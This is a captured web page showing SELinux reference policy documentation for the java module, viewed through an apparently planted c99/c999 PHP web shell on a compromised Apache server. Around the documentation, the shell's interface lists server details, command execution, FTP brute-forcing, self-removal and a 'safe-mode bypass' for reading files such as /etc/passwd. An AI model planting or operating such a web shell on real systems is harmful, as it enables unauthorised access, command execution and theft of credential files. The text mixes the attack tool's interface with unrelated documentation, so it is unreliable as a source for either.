!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/share/doc/selinux-policy-2.4.6/html/   drwxr-xr-x
Free 50.94 GB of 127.8 GB (39.86%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     apps_java.html (7.52 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
Security Enhanced Linux Reference Policy

Layer: apps

Module: java

Interfaces Templates

Description:

Java virtual machine

Interfaces:

java_domtrans( domain )
Summary

Execute the java program in the java domain.

Parameters
Parameter:Description:Optional:
domain

Domain allowed access.

No
java_exec( domain )
Summary

Execute the java program in the java domain.

Parameters
Parameter:Description:Optional:
domain

Domain allowed access.

No
java_spec_domtrans( domain , target_domain )
Summary

Execute a java in the specified domain

Description

Execute the java command in the specified domain. This allows the specified domain to execute any file on these filesystems in the specified domain.

Parameters
Parameter:Description:Optional:
domain

Domain allowed access.

No
target_domain

The type of the new process.

No
Return

Templates:

java_domtrans_user_javaplugin( userdomain_prefix , domain )
Summary

Run java in javaplugin domain.

Description

Run java in javaplugin domain.

This is a templated interface, and should only be called from a per-userdomain template.

Parameters
Parameter:Description:Optional:
userdomain_prefix

The prefix of the user domain (e.g., user is the prefix for user_t).

No
domain

Domain allowed access.

No
java_per_role_template( userdomain_prefix , user_domain , user_role )
Summary

The per role template for the java module.

Description

This template creates a derived domains which are used for java plugins that are executed by a browser.

This template is invoked automatically for each user, and generally does not need to be invoked directly by policy writers.

Parameters
Parameter:Description:Optional:
userdomain_prefix

The prefix of the user domain (e.g., user is the prefix for user_t).

No
user_domain

The type of the user domain.

No
user_role

The role associated with the user domain.

No
Return

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0133 ]--